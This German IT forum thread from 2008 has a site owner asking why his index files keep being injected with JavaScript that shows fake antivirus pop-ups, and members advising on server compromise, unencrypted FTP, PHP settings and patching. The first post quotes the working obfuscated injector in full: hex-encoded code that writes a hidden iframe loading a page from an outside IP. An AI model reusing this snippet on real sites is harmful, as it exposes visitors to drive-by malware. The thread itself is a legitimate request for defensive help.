Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Website Sicherheit

Frage Internet

Mitglied: el3ment

el3ment (Level 1) - Jetzt verbinden

16.06.2008, aktualisiert 18.06.2008, 5686 Aufrufe, 10 Kommentare

Ich habe ein Problem mit meiner Website, vor ein paar Tagen bemerkte ich das auf meienr Website imemr ein Popup aufgeht indem darauf hingewiesen wird das der PC von einem Virus befallen sei und man auf dei Seite "www.advancedxpdefender.com" gehen soll um sich eine Software runterzuladen.
Dann habe ich mir mal den Quellcode angeschaut und gesehen das jemand meine index (.php und .html) dateien manipuliert hat und folgenden Code eingefügt hat:

<script>
<!--
var d=document,kol=561;
function O10H48514B24F1CE6(H48514B24F20E3){ function H48514B24F24DF() {return 16;} return( parseInt(H48514B24F20E3,H48514B24F24DF()));}function H48514B24F2CEE(H48514B24F30EA){ var H48514B24F34E4='';for(H48514B24F38E1=0; H48514B24F38E1<H48514B24F30EA.length; H48514B24F38E1+=2){ H48514B24F34E4 += ( String.fromCharCode (O10H48514B24F1CE6(H48514B24F30EA.substr(H48514B24F38E1, 2))));}return H48514B24F34E4;} document.write(H48514B24F2CEE('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A38323238292B27623762325C272077696474683D323432206865696768743D3334207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>


Habe nun schon mehrmals den Code aus allen Index Dateien rausgenommen aber es passiert immer wieder!
Mein FTP Passwort kann meines Erachtens anch nicht gekanckt worden sein,da dies sehr stark ist (enthält Groß- und Kleinbuchstaben,Sonderzeichen und Zahlen).

Wie ist es möglich das jemand diese Dateien manipuliert?
Wie kann ich mich dagegen schützen?

Danke schonmal!

Grüße
Mitglied: harald21
16.06.2008 um 09:33 Uhr
Hallo,

was ist das für ein Webserver?
M$ oder *nix?
IIS oder Apache?

Wenn jemand deinen Server gehackt hat (und das er das hat steht außer Frage) dann ist evtl. auch ein Rootkit installiert, in diesem Fall ist die einzig sichere Möglichkeit, alles neu zu installieren.

Bitte überbewerte dein "starkes FTP-Passwort" nicht, bei FTP werden die Passwörter unverschlüsselt übertragen!

Mit freundlichen Grüßen
Harald
Bitte warten ..
Mitglied: SlainteMhath
16.06.2008 um 09:39 Uhr
Moin,

interessant ist auch was für eine Hosting umgebung das ist. Rootserver? Colocation? Oder eine 0,99€ HP beim Discounter?

lg,
Slainte
Bitte warten ..
Mitglied: el3ment
16.06.2008 um 09:51 Uhr
Linux Apache!
Hab den bei freeweb.de.

Neuinstallieren ist so eine Sache.... da steckt verdammt viel Arbeit drin und es sind noch mehrere Subdomains die da laufen.

Und angenommen ich würde alles neu machen, wie kann ich mich danach dann schützen?

Vielen Dank schonmal für die schnelle Antwort.
Bitte warten ..
Mitglied: el3ment
16.06.2008 um 09:52 Uhr
Ich nutze dieses Paket http://freeweb.de/privat.html
Bitte warten ..
Mitglied: SlainteMhath
16.06.2008 um 10:05 Uhr
Moin,

setzt dich direkt mit deinem Hoster in Verindung. Bei shared Hosting genügt es u.U. wenn eine Site auf dem Server gehackt wurde. Die sollen das checken!

Und angenommen ich würde alles neu machen, wie kann ich mich danach dann
schützen?
Im falle Shared Hosting eigentlich fast nicht. Du bist zu 100% von Deinem Hoster abhängig. Wenn der schlampig arbeitet und/oder nicht patcht kannst Du kaum was machen (ausser kündigen ^^).

Zusätzlich solltest Du Deine eigenen PHP Scripts auf Sicherheitslücken hin überprüfen, oder falls die "fremde" PHP Anwendungen einsetzt: immer zeitnah mit den aktuelle Patches verseorgen.

lg,
Slainte
Bitte warten ..
Mitglied: el3ment
16.06.2008 um 10:13 Uhr
Hier die Antworten von meinem Hoster:

erste mail:

Ihre Website ist nicht auf dem aktuellsten Stand und beinhaltet
Sicherheitsluecken. Ueber diese Luecken wurd Ihre Website gehackt und ein
Trojaner zum download angeboten. Ihre Seiten sind somit infiziert. Sie muessen
die Scripte manuell aendern und den Trojaner Script Code rausnehmen, oder die
Website neu einrichten. Installieren Sie nur aktuelle Scripte und halten Sie
sie immer auf dem aktuellsten Stand.

--> super Antwort

zweite mail mit der bitte um konkretere hinweise:

schwer zu sagen, meist passiert das in Verbindung mit aktiviertem
register_globals und url_fopen. Im Access Log koennen Sie einmal nach .txt
suchen, ausser den robot.txt, da sehen Sie meist, welche Datei hier unsicher
war. Ueber diese Datei kann dann Code von anderen Servern nachgeladen werden.
--> die zwei sachen habe ich deaktiviert und im accesslog habe ich keine *.txt gefunden.

Ich nutze derzeit Joomla 1.5.3stable und Wordpress 2.5.1, sind beide die aktuellsten Versionen.
Von daher bin ich immer noch ratlos.

grüße
Bitte warten ..
Mitglied: 16568
16.06.2008 um 11:34 Uhr
1.
stable und aktuell bedeutet nicht immer, daß die Dinger auch sicher sind, bestes Beispiel ist hier wohl Joomla
(gibt z.Zt. 4 0day-Exploits, zzgl. den alten Bekannten für die Extensions)

2.
Die Berechtigung für gewisse Dateien sollten auch ordnungsgemäß gesetzt sein...


Lonesome Walker
Bitte warten ..
Mitglied: el3ment
16.06.2008 um 11:48 Uhr
1. ist wohl war, ich wollte auch nicht mit meiner Aussage dies ausdrücken sondern nur das ich die derzeit aktuellste Version nutze, mehr kann man ja als Endnutzer auch nicht tun!

2. Habe schon die Berechtigungen der Index Dateien über Filezilla angepasst, habe nur dem Benutzer die Berchtigung Lesen und Schreiben erteilt.
Aber auch dies hat nix geholfen, ein paar Stunden später war das Script wieder drin... !

Also muss ja im Endeffekt jemand mein Passwort mitgelesen haben und sich so auf mein FTP-Server angemeldet haben und dann die Dateien manipuliert haben, sehe ich das so richtig?

grüße
Bitte warten ..
Mitglied: el3ment
17.06.2008 um 20:43 Uhr
Nachdem ich die "register_globals" und "url_fopen" deaktivert habe, mein FTP Passwort geändert habe und nun bei Filezilla immer eine Verschlüsselung verwende geht es.
Zumindest sind bis jetzt seit meinem letzten Post alle index dateien sauber geblieben!

wer also auch mal dieses oder ein ähnliches Problem haben sollte, könnte er die oben genannten Sachen anwenden.

Vielen Dank nochmal für die schnellen Antworten, imemr wieder TOP in diesem Forum!!!
Bitte warten ..
Mitglied: el3ment
18.06.2008 um 09:10 Uhr
Zu früh gefreut!!!

Das Script ist wieder drin, aber es gibt etwas neues... es handelt sich um den "JS/Dldr.Iframe.BM" Java-Scriptvirus, diese Virendefinition wurde gestern bei Antivir in die Defintionsdatei eingepflegt.

Was mir noch eingefallen ist, ich habe mal gehört das solcher Code auch über Kontaktformulare oder ähnliches eingeschleust werden kann.
Und da ich auf meiner Seite ein Gästebuch und ein Kontaktformular habe, habe ich das Kontaktformular gleich mal deaktiviert.

Kann mir jemand darüber etwas genauere AUskunft geben, auf was man achten sollte, etc...!?

Grüße
Bitte warten ..
Neuester Wissensbeitrag
Heiß diskutierte Inhalte
Windows Userverwaltung
Ausgeschiedene Mitarbeiter im Unternehmen - was tun mit den AD Konten? (27)

Frage von patz223 zum Thema Windows Userverwaltung ...

Viren und Trojaner
Aufgepasst: Neue Ransomware Goldeneye verbreitet sich rasant (20)

Link von Penny.Cilin zum Thema Viren und Trojaner ...

LAN, WAN, Wireless
FritzBox, zwei Server, verschiedene Netze (20)

Frage von DavidGl zum Thema LAN, WAN, Wireless ...

Windows Netzwerk
Windows 10 RDP geht nicht (18)

Frage von Fiasko zum Thema Windows Netzwerk ...